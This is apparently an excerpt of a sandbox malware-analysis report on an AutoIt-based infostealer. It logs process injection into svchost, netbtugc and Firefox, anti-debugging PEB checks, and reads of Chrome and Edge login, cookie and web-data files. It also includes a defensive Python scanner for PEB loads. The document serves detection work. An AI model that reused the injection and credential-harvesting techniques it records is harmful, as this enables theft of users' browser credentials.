            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B7096E mov edx, dword ptr fs:[00000030h]2_2_03B7096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B7096E mov eax, dword ptr fs:[00000030h]2_2_03B7096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB0946 mov eax, dword ptr fs:[00000030h]2_2_03BB0946
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BBC89D mov eax, dword ptr fs:[00000030h]2_2_03BBC89D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B30887 mov eax, dword ptr fs:[00000030h]2_2_03B30887
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6C8F9 mov eax, dword ptr fs:[00000030h]2_2_03B6C8F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6C8F9 mov eax, dword ptr fs:[00000030h]2_2_03B6C8F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BFA8E4 mov eax, dword ptr fs:[00000030h]2_2_03BFA8E4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5E8C0 mov eax, dword ptr fs:[00000030h]2_2_03B5E8C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B52835 mov eax, dword ptr fs:[00000030h]2_2_03B52835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B52835 mov eax, dword ptr fs:[00000030h]2_2_03B52835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B52835 mov eax, dword ptr fs:[00000030h]2_2_03B52835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B52835 mov ecx, dword ptr fs:[00000030h]2_2_03B52835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B52835 mov eax, dword ptr fs:[00000030h]2_2_03B52835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B52835 mov eax, dword ptr fs:[00000030h]2_2_03B52835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6A830 mov eax, dword ptr fs:[00000030h]2_2_03B6A830
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD483A mov eax, dword ptr fs:[00000030h]2_2_03BD483A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD483A mov eax, dword ptr fs:[00000030h]2_2_03BD483A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BBC810 mov eax, dword ptr fs:[00000030h]2_2_03BBC810
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BBE872 mov eax, dword ptr fs:[00000030h]2_2_03BBE872
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BBE872 mov eax, dword ptr fs:[00000030h]2_2_03BBE872
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC6870 mov eax, dword ptr fs:[00000030h]2_2_03BC6870
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BC6870 mov eax, dword ptr fs:[00000030h]2_2_03BC6870
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B60854 mov eax, dword ptr fs:[00000030h]2_2_03B60854
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B34859 mov eax, dword ptr fs:[00000030h]2_2_03B34859
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B34859 mov eax, dword ptr fs:[00000030h]2_2_03B34859
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B42840 mov ecx, dword ptr fs:[00000030h]2_2_03B42840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C04FE7 mov eax, dword ptr fs:[00000030h]2_2_03C04FE7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B62F98 mov eax, dword ptr fs:[00000030h]2_2_03B62F98
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B62F98 mov eax, dword ptr fs:[00000030h]2_2_03B62F98
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6CF80 mov eax, dword ptr fs:[00000030h]2_2_03B6CF80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B70FF6 mov eax, dword ptr fs:[00000030h]2_2_03B70FF6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B70FF6 mov eax, dword ptr fs:[00000030h]2_2_03B70FF6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B70FF6 mov eax, dword ptr fs:[00000030h]2_2_03B70FF6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B70FF6 mov eax, dword ptr fs:[00000030h]2_2_03B70FF6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE6FF7 mov eax, dword ptr fs:[00000030h]2_2_03BE6FF7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4CFE0 mov eax, dword ptr fs:[00000030h]2_2_03B4CFE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4CFE0 mov eax, dword ptr fs:[00000030h]2_2_03B4CFE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2EFD8 mov eax, dword ptr fs:[00000030h]2_2_03B2EFD8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2EFD8 mov eax, dword ptr fs:[00000030h]2_2_03B2EFD8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2EFD8 mov eax, dword ptr fs:[00000030h]2_2_03B2EFD8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B32FC8 mov eax, dword ptr fs:[00000030h]2_2_03B32FC8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B32FC8 mov eax, dword ptr fs:[00000030h]2_2_03B32FC8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B32FC8 mov eax, dword ptr fs:[00000030h]2_2_03B32FC8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B32FC8 mov eax, dword ptr fs:[00000030h]2_2_03B32FC8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5EF28 mov eax, dword ptr fs:[00000030h]2_2_03B5EF28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B32F12 mov eax, dword ptr fs:[00000030h]2_2_03B32F12
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C04F68 mov eax, dword ptr fs:[00000030h]2_2_03C04F68
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6CF1F mov eax, dword ptr fs:[00000030h]2_2_03B6CF1F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE6F00 mov eax, dword ptr fs:[00000030h]2_2_03BE6F00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5AF69 mov eax, dword ptr fs:[00000030h]2_2_03B5AF69
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5AF69 mov eax, dword ptr fs:[00000030h]2_2_03B5AF69
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD2F60 mov eax, dword ptr fs:[00000030h]2_2_03BD2F60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD2F60 mov eax, dword ptr fs:[00000030h]2_2_03BD2F60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2CF50 mov eax, dword ptr fs:[00000030h]2_2_03B2CF50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2CF50 mov eax, dword ptr fs:[00000030h]2_2_03B2CF50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2CF50 mov eax, dword ptr fs:[00000030h]2_2_03B2CF50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2CF50 mov eax, dword ptr fs:[00000030h]2_2_03B2CF50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2CF50 mov eax, dword ptr fs:[00000030h]2_2_03B2CF50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2CF50 mov eax, dword ptr fs:[00000030h]2_2_03B2CF50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6CF50 mov eax, dword ptr fs:[00000030h]2_2_03B6CF50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BD0F50 mov eax, dword ptr fs:[00000030h]2_2_03BD0F50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB4F40 mov eax, dword ptr fs:[00000030h]2_2_03BB4F40
            Source: C:\Users\user\Desktop\opp46lGmxd.exeCode function: 0_2_00AB81F7 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_00AB81F7
            Source: C:\Users\user\Desktop\opp46lGmxd.exeCode function: 0_2_00A8A395 SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00A8A395
            Source: C:\Users\user\Desktop\opp46lGmxd.exeCode function: 0_2_00A8A364 SetUnhandledExceptionFilter,0_2_00A8A364
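
Every svchost.exe row above is keyed on one instruction, mov r32, dword ptr fs:[00000030h], which in a 32-bit (here WOW64) process loads the address of the Process Environment Block. The read itself is neutral: position-independent payloads walk PEB->Ldr to resolve API addresses without imports, while a debugger check reads PEB->BeingDebugged or PEB->NtGlobalFlag, so the instruction that consumes the PEB pointer is what separates API resolution from anti-debugging. The Python below is an added example, not part of the Joe Sandbox report and not code taken from the sample: it scans a 32-bit code buffer for the same encodings the report matched and classifies the instruction that follows each load by the PEB offset it dereferences. The byte string is hand-assembled for the example, not dumped from the sample, and the field table is the standard 32-bit PEB layout.

```python
"""Locate 32-bit PEB loads (mov r32, dword ptr fs:[30h]) in raw code and classify
the instruction that consumes the pointer. Added example; not part of the
sandbox report and not code taken from the sample."""

# Register numbering as used in ModRM reg/rm fields.
REGS = ["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"]

# Standard 32-bit PEB field offsets that injected code commonly reads.
PEB_FIELDS = {
    0x02: "BeingDebugged",
    0x08: "ImageBaseAddress",
    0x0C: "Ldr",
    0x10: "ProcessParameters",
    0x18: "ProcessHeap",
    0x68: "NtGlobalFlag",
}


def peb_load_patterns():
    """Map each encoding of 'mov r32, dword ptr fs:[00000030h]' to its register.
    eax has the short moffs32 form (64 A1 disp32); every register, eax included,
    also has the ModRM form 64 8B /r with mod=00 rm=101 (absolute disp32)."""
    patterns = {b"\x64\xa1\x30\x00\x00\x00": "eax"}
    for idx, reg in enumerate(REGS):
        modrm = (idx << 3) | 0b101
        patterns[b"\x64\x8b" + bytes([modrm]) + b"\x30\x00\x00\x00"] = reg
    return patterns


def classify_followup(code, pos, reg_idx):
    """Decode the instruction at pos if it dereferences the PEB register with an
    8-bit displacement: mov r32,[reg+d8] (8B /r), movzx r32, byte [reg+d8]
    (0F B6 /r) or cmp byte [reg+d8], imm8 (80 /7 ib). Returns (field, offset)
    or (None, None). esp as base would need a SIB byte and is not handled."""
    if reg_idx == 4:
        return None, None

    def disp8_on_reg(modrm):
        return (modrm >> 6) == 0b01 and (modrm & 7) == reg_idx

    b = code[pos:pos + 4]
    if len(b) >= 3 and b[0] == 0x8B and disp8_on_reg(b[1]):
        off = b[2]
    elif len(b) >= 4 and b[0] == 0x0F and b[1] == 0xB6 and disp8_on_reg(b[2]):
        off = b[3]
    elif len(b) >= 4 and b[0] == 0x80 and disp8_on_reg(b[1]) and ((b[1] >> 3) & 7) == 7:
        off = b[2]
    else:
        return None, None
    return PEB_FIELDS.get(off, "unknown"), off


def scan_peb_reads(code):
    """Return one dict per PEB load: offset, register and the PEB field (if any)
    read by the very next instruction."""
    patterns = peb_load_patterns()
    hits, i = [], 0
    while i < len(code):
        for pat, reg in patterns.items():
            if code.startswith(pat, i):
                field, off = classify_followup(code, i + len(pat), REGS.index(reg))
                hits.append({"offset": i, "reg": reg, "peb_field": field, "peb_offset": off})
                i += len(pat) - 1
                break
        i += 1
    return hits


def summarize_peb_reads(hits):
    """Count hits per PEB field; loads whose next instruction is not a PEB
    dereference are reported as 'unclassified'."""
    counts = {}
    for h in hits:
        key = h["peb_field"] or "unclassified"
        counts[key] = counts.get(key, 0) + 1
    return counts


# Hand-assembled 32-bit snippet for the example (not bytes from the sample):
#   mov eax, fs:[30h] ; movzx eax, byte ptr [eax+2]   -> BeingDebugged check
#   mov ecx, fs:[30h] ; mov ecx, [ecx+0Ch]            -> PEB->Ldr, API resolution
#   mov edx, fs:[30h] ; mov edx, [edx+68h]            -> NtGlobalFlag check
#   mov esi, fs:[30h] ; push esi                      -> pointer saved, nothing read yet
#   mov eax, fs:[30h] ; cmp byte ptr [eax+2], 0       -> BeingDebugged check
SAMPLE_CODE = bytes.fromhex(
    "64A130000000" "0FB64002"
    "648B0D30000000" "8B490C"
    "648B1530000000" "8B5268"
    "648B3530000000" "56"
    "64A130000000" "80780200"
)

if __name__ == "__main__":
    for h in scan_peb_reads(SAMPLE_CODE):
        print(f"+{h['offset']:04x}: mov {h['reg']}, fs:[30h] -> {h['peb_field']}")
    print(summarize_peb_reads(scan_peb_reads(SAMPLE_CODE)))
```

Run against a memory dump of the injected svchost.exe region, a load whose follow-up reads +0x0C is API resolution and can be ignored for anti-debug purposes; +0x02 and +0x68 are the reads that justify the "checks if the current process is being debugged" verdict. The scanner only looks one instruction ahead, so a load that is saved to a register or the stack first shows up as unclassified and needs manual follow-up.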

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\Program Files (x86)\VeorSPuLTmCFzZMntyoDAJPwtGEDNugfKQRakBcdCYqONSYnv\hKABgfptdlPzDLVJYF.exe | NtQueryVolumeInformationFile: Direct from: 0x76F12F2C
            Source: C:\Program Files (x86)\VeorSPuLTmCFzZMntyoDAJPwtGEDNugfKQRakBcdCYqONSYnv\hKABgfptdlPzDLVJYF.exe | NtQuerySystemInformation: Direct from: 0x76F148CC
            Source: C:\Program Files (x86)\VeorSPuLTmCFzZMntyoDAJPwtGEDNugfKQRakBcdCYqONSYnv\hKABgfptdlPzDLVJYF.exe | NtAllocateVirtualMemory: Direct from: 0x76F148EC
            Source: C:\Program Files (x86)\VeorSPuLTmCFzZMntyoDAJPwtGEDNugfKQRakBcdCYqONSYnv\hKABgfptdlPzDLVJYF.exe | NtQueryAttributesFile: Direct from: 0x76F12E6C
            Source: C:\Program Files (x86)\VeorSPuLTmCFzZMntyoDAJPwtGEDNugfKQRakBcdCYqONSYnv\hKABgfptdlPzDLVJYF.exe | NtReadVirtualMemory: Direct from: 0x76F12E8C
            Source: C:\Program Files (x86)\VeorSPuLTmCFzZMntyoDAJPwtGEDNugfKQRakBcdCYqONSYnv\hKABgfptdlPzDLVJYF.exe | NtCreateKey: Direct from: 0x76F12C6C
            Source: C:\Program Files (x86)\VeorSPuLTmCFzZMntyoDAJPwtGEDNugfKQRakBcdCYqONSYnv\hKABgfptdlPzDLVJYF.exe | NtSetInformationThread: Direct from: 0x76F12B4C
            Source: C:\Program Files (x86)\VeorSPuLTmCFzZMntyoDAJPwtGEDNugfKQRakBcdCYqONSYnv\hKABgfptdlPzDLVJYF.exe | NtClose: Direct from: 0x76F12B6C
            Source: C:\Program Files (x86)\VeorSPuLTmCFzZMntyoDAJPwtGEDNugfKQRakBcdCYqONSYnv\hKABgfptdlPzDLVJYF.exe | NtOpenKeyEx: Direct from: 0x76F13C9C
            Source: C:\Program Files (x86)\VeorSPuLTmCFzZMntyoDAJPwtGEDNugfKQRakBcdCYqONSYnv\hKABgfptdlPzDLVJYF.exe | NtWriteVirtualMemory: Direct from: 0x76F1490C
            Source: C:\Program Files (x86)\VeorSPuLTmCFzZMntyoDAJPwtGEDNugfKQRakBcdCYqONSYnv\hKABgfptdlPzDLVJYF.exe | NtCreateUserProcess: Direct from: 0x76F1371C
            Source: C:\Program Files (x86)\VeorSPuLTmCFzZMntyoDAJPwtGEDNugfKQRakBcdCYqONSYnv\hKABgfptdlPzDLVJYF.exe | NtTerminateThread: Direct from: 0x76F12FCC
            Source: C:\Program Files (x86)\VeorSPuLTmCFzZMntyoDAJPwtGEDNugfKQRakBcdCYqONSYnv\hKABgfptdlPzDLVJYF.exe | NtCreateFile: Direct from: 0x76F12FEC
            Source: C:\Program Files (x86)\VeorSPuLTmCFzZMntyoDAJPwtGEDNugfKQRakBcdCYqONSYnv\hKABgfptdlPzDLVJYF.exe | NtOpenFile: Direct from: 0x76F12DCC
            Source: C:\Program Files (x86)\VeorSPuLTmCFzZMntyoDAJPwtGEDNugfKQRakBcdCYqONSYnv\hKABgfptdlPzDLVJYF.exe | NtQueryInformationToken: Direct from: 0x76F12CAC
            Source: C:\Program Files (x86)\VeorSPuLTmCFzZMntyoDAJPwtGEDNugfKQRakBcdCYqONSYnv\hKABgfptdlPzDLVJYF.exe | NtQueryValueKey: Direct from: 0x76F12BEC
            Source: C:\Program Files (x86)\VeorSPuLTmCFzZMntyoDAJPwtGEDNugfKQRakBcdCYqONSYnv\hKABgfptdlPzDLVJYF.exe | NtDeviceIoControlFile: Direct from: 0x76F12AEC
            Source: C:\Program Files (x86)\VeorSPuLTmCFzZMntyoDAJPwtGEDNugfKQRakBcdCYqONSYnv\hKABgfptdlPzDLVJYF.exe | NtSetInformationThread: Direct from: 0x76F063F9
            Source: C:\Program Files (x86)\VeorSPuLTmCFzZMntyoDAJPwtGEDNugfKQRakBcdCYqONSYnv\hKABgfptdlPzDLVJYF.exe | NtOpenSection: Direct from: 0x76F12E0C
            Source: C:\Program Files (x86)\VeorSPuLTmCFzZMntyoDAJPwtGEDNugfKQRakBcdCYqONSYnv\hKABgfptdlPzDLVJYF.exe | NtMapViewOfSection: Direct from: 0x76F12D1C
            Source: C:\Program Files (x86)\VeorSPuLTmCFzZMntyoDAJPwtGEDNugfKQRakBcdCYqONSYnv\hKABgfptdlPzDLVJYF.exe | NtResumeThread: Direct from: 0x76F136AC
            Source: C:\Program Files (x86)\VeorSPuLTmCFzZMntyoDAJPwtGEDNugfKQRakBcdCYqONSYnv\hKABgfptdlPzDLVJYF.exe | NtCreateMutant: Direct from: 0x76F135CC
            Source: C:\Program Files (x86)\VeorSPuLTmCFzZMntyoDAJPwtGEDNugfKQRakBcdCYqONSYnv\hKABgfptdlPzDLVJYF.exe | NtWriteVirtualMemory: Direct from: 0x76F12E3C
            Source: C:\Program Files (x86)\VeorSPuLTmCFzZMntyoDAJPwtGEDNugfKQRakBcdCYqONSYnv\hKABgfptdlPzDLVJYF.exe | NtNotifyChangeKey: Direct from: 0x76F13C2C
            Source: C:\Program Files (x86)\VeorSPuLTmCFzZMntyoDAJPwtGEDNugfKQRakBcdCYqONSYnv\hKABgfptdlPzDLVJYF.exe | NtProtectVirtualMemory: Direct from: 0x76F07B2E
            Source: C:\Program Files (x86)\VeorSPuLTmCFzZMntyoDAJPwtGEDNugfKQRakBcdCYqONSYnv\hKABgfptdlPzDLVJYF.exe | NtProtectVirtualMemory: Direct from: 0x76F12F9C
            Source: C:\Program Files (x86)\VeorSPuLTmCFzZMntyoDAJPwtGEDNugfKQRakBcdCYqONSYnv\hKABgfptdlPzDLVJYF.exe | NtSetInformationProcess: Direct from: 0x76F12C5C
            Source: C:\Program Files (x86)\VeorSPuLTmCFzZMntyoDAJPwtGEDNugfKQRakBcdCYqONSYnv\hKABgfptdlPzDLVJYF.exe | NtOpenKeyEx: Direct from: 0x76F12B9C
            Source: C:\Program Files (x86)\VeorSPuLTmCFzZMntyoDAJPwtGEDNugfKQRakBcdCYqONSYnv\hKABgfptdlPzDLVJYF.exe | NtQueryInformationProcess: Direct from: 0x76F12C26
            Source: C:\Program Files (x86)\VeorSPuLTmCFzZMntyoDAJPwtGEDNugfKQRakBcdCYqONSYnv\hKABgfptdlPzDLVJYF.exe | NtResumeThread: Direct from: 0x76F12FBC
            Source: C:\Program Files (x86)\VeorSPuLTmCFzZMntyoDAJPwtGEDNugfKQRakBcdCYqONSYnv\hKABgfptdlPzDLVJYF.exe | NtDelayExecution: Direct from: 0x76F12DDC
            Source: C:\Program Files (x86)\VeorSPuLTmCFzZMntyoDAJPwtGEDNugfKQRakBcdCYqONSYnv\hKABgfptdlPzDLVJYF.exe | NtReadFile: Direct from: 0x76F12ADC
            Source: C:\Program Files (x86)\VeorSPuLTmCFzZMntyoDAJPwtGEDNugfKQRakBcdCYqONSYnv\hKABgfptdlPzDLVJYF.exe | NtQuerySystemInformation: Direct from: 0x76F12DFC
            Source: C:\Program Files (x86)\VeorSPuLTmCFzZMntyoDAJPwtGEDNugfKQRakBcdCYqONSYnv\hKABgfptdlPzDLVJYF.exe | NtAllocateVirtualMemory: Direct from: 0x76F12BFC
            Source: C:\Users\user\Desktop\opp46lGmxd.exe | Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL target: C:\Program Files (x86)\VeorSPuLTmCFzZMntyoDAJPwtGEDNugfKQRakBcdCYqONSYnv\hKABgfptdlPzDLVJYF.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL target: C:\Windows\SysWOW64\netbtugc.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: NULL target: C:\Program Files (x86)\VeorSPuLTmCFzZMntyoDAJPwtGEDNugfKQRakBcdCYqONSYnv\hKABgfptdlPzDLVJYF.exe protection: read write
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: NULL target: C:\Program Files (x86)\VeorSPuLTmCFzZMntyoDAJPwtGEDNugfKQRakBcdCYqONSYnv\hKABgfptdlPzDLVJYF.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\netbtugc.exe | Thread register set: target process: 8020
            Source: C:\Windows\SysWOW64\netbtugc.exe | Thread APC queued: target process: C:\Program Files (x86)\VeorSPuLTmCFzZMntyoDAJPwtGEDNugfKQRakBcdCYqONSYnv\hKABgfptdlPzDLVJYF.exe
            Source: C:\Users\user\Desktop\opp46lGmxd.exe | Memory written: C:\Windows\SysWOW64\svchost.exe base: 30E1008
            Source: C:\Users\user\Desktop\opp46lGmxd.exe | Code function: 0_2_00AB8C93 LogonUserW
            Source: C:\Users\user\Desktop\opp46lGmxd.exe | Code function: 0_2_00A63B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW
            Source: C:\Users\user\Desktop\opp46lGmxd.exe | Code function: 0_2_00A64A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput
            Source: C:\Users\user\Desktop\opp46lGmxd.exe | Code function: 0_2_00AC4EF5 mouse_event
            Source: C:\Users\user\Desktop\opp46lGmxd.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\opp46lGmxd.exe"
            Source: C:\Program Files (x86)\VeorSPuLTmCFzZMntyoDAJPwtGEDNugfKQRakBcdCYqONSYnv\hKABgfptdlPzDLVJYF.exe | Process created: C:\Windows\SysWOW64\netbtugc.exe "C:\Windows\SysWOW64\netbtugc.exe"
            Source: C:\Windows\SysWOW64\netbtugc.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\opp46lGmxd.exe | Code function: 0_2_00AB81F7 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity
            Source: C:\Users\user\Desktop\opp46lGmxd.exe | Code function: 0_2_00AC4C03 AllocateAndInitializeSid,CheckTokenMembership,FreeSid
            Source: opp46lGmxd.exe | Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
            Source: opp46lGmxd.exe, hKABgfptdlPzDLVJYF.exe, 00000003.00000002.3853250692.0000000001231000.00000002.00000001.00040000.00000000.sdmp, hKABgfptdlPzDLVJYF.exe, 00000003.00000000.1460071345.0000000001230000.00000002.00000001.00040000.00000000.sdmp, hKABgfptdlPzDLVJYF.exe, 00000006.00000000.1613676443.0000000001521000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
            Source: hKABgfptdlPzDLVJYF.exe, 00000003.00000002.3853250692.0000000001231000.00000002.00000001.00040000.00000000.sdmp, hKABgfptdlPzDLVJYF.exe, 00000003.00000000.1460071345.0000000001230000.00000002.00000001.00040000.00000000.sdmp, hKABgfptdlPzDLVJYF.exe, 00000006.00000000.1613676443.0000000001521000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
            Source: hKABgfptdlPzDLVJYF.exe, 00000003.00000002.3853250692.0000000001231000.00000002.00000001.00040000.00000000.sdmp, hKABgfptdlPzDLVJYF.exe, 00000003.00000000.1460071345.0000000001230000.00000002.00000001.00040000.00000000.sdmp, hKABgfptdlPzDLVJYF.exe, 00000006.00000000.1613676443.0000000001521000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
            Source: hKABgfptdlPzDLVJYF.exe, 00000003.00000002.3853250692.0000000001231000.00000002.00000001.00040000.00000000.sdmp, hKABgfptdlPzDLVJYF.exe, 00000003.00000000.1460071345.0000000001230000.00000002.00000001.00040000.00000000.sdmp, hKABgfptdlPzDLVJYF.exe, 00000006.00000000.1613676443.0000000001521000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: yProgram Manager
            Source: C:\Users\user\Desktop\opp46lGmxd.exe | Code function: 0_2_00A8886B cpuid
            Source: C:\Users\user\Desktop\opp46lGmxd.exe | Code function: 0_2_00A950D7 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter
            Source: C:\Users\user\Desktop\opp46lGmxd.exe | Code function: 0_2_00AA2230 GetUserNameW
            Source: C:\Users\user\Desktop\opp46lGmxd.exe | Code function: 0_2_00A9418A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte
            Source: C:\Users\user\Desktop\opp46lGmxd.exe | Code function: 0_2_00A64AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo

            Stealing of Sensitive Information

            Source: Yara match | File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 00000004.00000002.3854247183.0000000003760000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.1536824368.00000000039A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000006.00000002.3854245040.0000000002A30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000002.3847634373.0000000003290000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.1536423830.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000002.3854165692.0000000003720000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.1537312165.0000000004C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000003.00000002.3853922844.00000000032F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Windows\SysWOW64\netbtugc.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
            Source: C:\Windows\SysWOW64\netbtugc.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
            Source: C:\Windows\SysWOW64\netbtugc.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
            Source: C:\Windows\SysWOW64\netbtugc.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
            Source: C:\Windows\SysWOW64\netbtugc.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
            Source: C:\Windows\SysWOW64\netbtugc.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
